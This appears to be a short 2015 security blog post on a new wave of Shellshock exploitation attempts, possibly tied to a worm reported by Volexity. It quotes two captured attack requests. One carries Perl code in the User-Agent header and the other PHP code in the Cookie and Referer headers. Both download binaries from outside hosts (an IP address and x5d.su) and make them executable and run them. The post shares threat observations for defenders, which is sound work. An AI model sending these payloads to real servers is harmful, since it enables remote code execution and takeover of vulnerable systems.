Shellshock has been kinda quiet recently, but just in the last day or two there's been a big uptick and it appears it might be related to this Shellshock Worm that Volexity reported on.
I've seen 2 variants so far
GET /cgi-bin/test-cgi.pl HTTP/1.1
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
GET /cgi-mod/index.cgi HTTP/1.0
Cookie: () { :;} ;echo;/usr/bin/php -r '$a = "http://x5d.su/x/AS1";''$b = "http://x5d.su/x/AS2";''$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
Referer: () { :;} ;echo;/usr/local/bin/php -r '$a = "http://x5d.su/x/AS1";''$b = "http://x5d.su/x/AS2";''$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
I pasted several examples of each
first example
example 1
example 2
example 3
example 4
example 5
example 6
example 7
second example
example 1
example 2
example 3
example 4
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
No comments:
Post a Comment